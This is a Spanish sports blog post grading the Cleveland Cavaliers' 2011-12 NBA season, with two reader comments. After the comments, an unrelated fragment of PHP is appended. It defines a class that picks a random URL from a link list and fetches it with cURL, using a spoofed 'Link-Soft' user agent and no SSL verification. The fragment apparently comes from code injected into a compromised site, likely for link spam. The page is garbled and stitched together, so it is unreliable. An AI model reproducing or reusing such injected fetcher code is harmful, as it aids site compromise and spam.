Cleveland Cavaliers: Suspenso

05 de July de 2012 por txusma

Durante unos minutos he dudado sobre si aprobar o no a los Cavaliers. Las sensaciones que han dejado esta campaña no han sido malas. Lo primero que viene a la cabeza es que, contra todo pronóstico, Cleveland estaba luchando por entrar en los Playoffs en la primera parte de la temporada. Kyrie Irving sobrepasaba las mejores expectativas y junto a un rejuvenecido Antawn Jamison y un batallador Anderson Varejao, llegaron a pisar las plazas nobles en algún momento. Pero al final los números mandan. Un rápido repaso a la clasificación final nos descubre que, sensaciones aparte, los Cavaliers han quedado por detrás de Pistons, Raptors e incluso Nets. No podemos aprobar al cuarto peor equipo de la competición, sería demasiado injusto.

Los Cavaliers empezaban la temporada con pocas esperanzas respecto al resultado final pero muchas ilusiones depositadas en el número 1 del draft, Kyrie Irving. Tras jugar sólo 11 partidos en la Universidad, el ex base de Duke se enfrentaba a la sombra de Lebron James. Sobre sus hombros recaía la responsabilidad de llevar de nuevo a Cleveland partidos de playoffs. No lo ha conseguido este año pero nadie duda de que, igual que jugará muchos partidos del All Star, en un futuro más bien cercano, bajo su liderazgo, los Cavs volverán a pisar la postemporada. Posiblemente en España hemos estado un poco cegados por el brillo de Ricky Rubio y a lo mejor ha pasado un poco desapercibida la increíble y maravillosa temporada que ha protagonizado: 18’5 puntos, 3’7 rebotes, 5’4 asistencias, 1’1 robos, 47% de acierto en el tiro, tiros sobre la bocina, responsabilidad asumida en el clutch time, espectáculo puro… El futuro es totalmente suyo. Si nada se tuerce, sus duelos con Ricky pueden marcar a toda una generación.

Beneficiados por un calendario muy benévolo en sus primeros partidos, los Cavs pisaron las plazas de postemporada en alguna ocasión y hasta el 21 de Febrero estuvieron en la pelea. A partir de ese día, solo ganarían 8 partidos más. 10 días antes se había lesionado de gravedad Anderson Varejao. El brasileño estaba protagonizando un gran inicio de temporada, convertido en una máquina del doble-doble y junto a Antawn Jamison, formaba un dúo interior más que digno para pegarse con los cocos de la conferencia. Su lesión trastocó definitivamente todos los planes y finiquitó esperanzas. Semih Erden y Ryan Hollins salieron de titulares en los siguientes partidos y fue tal el desastre que Byron Scott se la acabó jugando con el rookie Tristan Thompson. A pesar de no hacerlo mal, la controvertida cuarta elección del draft, dejó claro que su posición es la de ala-pívot. Thompson tiene un gran olfato para los rebotes, sobretodo ofensivos (3’1 por partido, ojo) pero ha de mejorar mucho su juego ofensivo para convertirse en alguien realmente importante en la liga. Tampoco su defensa es tan buena como para prescindir de su aportación en ataque (como pasa, por ejemplo, con Varejao).

Totalmente desahuciados en la clasificación, el 15 de Marzo traspasaron a Ramon Sessions, que estaba cumpliendo con creces en su papel de base suplente, a los Lakers. Sessions era, aunque algún aficionado de los Lakers no piense lo mismo, demasiado bueno para ser suplente. Más o menos por esas fechas apareció en el quinteto titular Alonzo Gee, sustituyendo al israelí Omri Casspi, una de las decepciones de la temporada. A sus 25 años, Alonzo Gee ya es todo un trotamundos del basqueta. Fue rookie del año de la temporada 2009-2010 de la D-League, en la 2010-2011 jugó en 3 equipos diferentes de la NBA, durante el lockout llegó a firmar por el equipo polaco Asseco Prokom Gdynia y esta temporada parece que por fin ha encontrado la estabilidad en los Cavaliers. Sus aportaciones han sido muy valiosas y ha demostrado que puede formar parte de la plantilla de cualquier equipo de la NBA. De momento los Cavs ya la han presentado la oferta cualificada por lo que Gee se ha convertido en agente libre restringido.

A pesar del suspenso, estoy seguro de que los aficionados de los Cavs están más que contentos. Su futuro se muestra optimista gracias, sobretodo, a Kyrie Irving que no solo les va a llevar muy lejos en la liga sinó que es posible que de su mano recuperen parte del impacto global que perdieron con la marcha de Lebron James. Con Irving y jugadores como Tristan Thompson, Anderson Varejao, Alonzo Gee, Dion Waiters, Tyler Zeller y el brutal hueco salarial que tienen para la temporada 2013/2014 se puede soñar.

Lo mejor: Kyrie Irving, Kyrie Irving y, sobretodo, Kyrie Irving.

Lo peor: La lesión de Anderson Varejao. Quien sabe si hubieran peleado hasta el último segundo por entrar en los Playoffs.

Jugando a GM

– Bien poquita cosa haría. Este año tampoco hay objetivo más allá de darle minutos a los Thompson, Waiters y Zeller.

– Antawn Jamison no continuará en el equipo y su baja se va a notar mucho porque no tienen un anotador en la pintura. Tristan Thompson deberá aprender a marchas forzadas. Dejémosle que lo haga.

– Renovaría a Alonzo Gee y Luke Harangody y me utilizaría la Team Option sobre Daniel Gibson, lo que me dejaría el equipo prácticamente hecho.

– Tal vez ficharía un par de retales baratos como Sonny Weems o Michael Redd para dotar de un poco de veteranía al equipo.

Comenta

2 comentarios a esta entrada

  1. simon dice:
    #1

    Como veis la incorporación de Zeller? dicen que tiene muchos problemas defensivos pero creo que eso en la conferencia Este no es tan tan importante como en la conferencia Oeste puestampoco hay mas de 2 o 3 juegos interiores potentes en esta conferencia.

      Citar

  2. Sancho88 dice:
    #2

    Buen análisis Txus. Como dices, no se les puede aprobar, pero dieron guerra en el primer mes de competición. De todas formas, yo pienso que ganaron bastantes partidos al principio por tener un calendario relativamente fácil y por estar muy concentrados. Sobre Thompson, le faltan centímetros, es obvio, pero pelea como el que más y no tiene miedo a nadie. Creo que tiene que tener mas temple, no hacer faltas estúpidas y mejorar y pulir sus movimientos en la zona. Es pura fuerza, pero la fuerza sin control… ya se sabe. Muchos de esos rebotes vienen tras tiro fallado y coger su propio rebote.

    Pero yo apuntaría en el resumen el valor añadido que supone tener a Byron Scott en el banquillo. Se les ve jugar bien a pesar de no tener casi nada. Hay jugadas que se ejecutan muy bien buscando las esquinas a Gibson o Parker, doblando balones fáciles para anotar en la zona con Thompson, tb. con Gee, al que encuentran muchas veces en buenísimas posiciones cerca del aro (Kakiouzis rules, xD), etc. Y luego, pues evidentemente tienes a Irving que el tipo es una maravilla jugando desde el centro, aprovechando bloqueos o símplemente en el 1×1. Una delicia técnica, yo diría que entre los 10 mejores jugadores de la competición en este aspecto.

    Creo que en este tipo de juego, tener una metralleta como Waiters les va a dar muchísimos puntos. Incluso Gee, que no es un tirador, ha tenido buenas rachas desde fuera . Cavaliers es un equipo que le gusta el juego exterior, aunque la baja de Jamison les va a pesar seguramente. La clave es que vuelva Varejao a tope, y entonces todo cambiará, sobre todo en defensa. A ver que tal Zeller tb.

    En definitiva, un equipo joven que ha peleado, ha jugado relativamente bien dentro de sus posibilidades, creciendo uno por uno, y a ver ahora qué son capaces de hacer. En mi opinión se equivocaron comiéndose a Walton, obvio, y creo que tb podrían haber sacado más provecho de Eyenga. No entiendo por qué no jugó nada…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>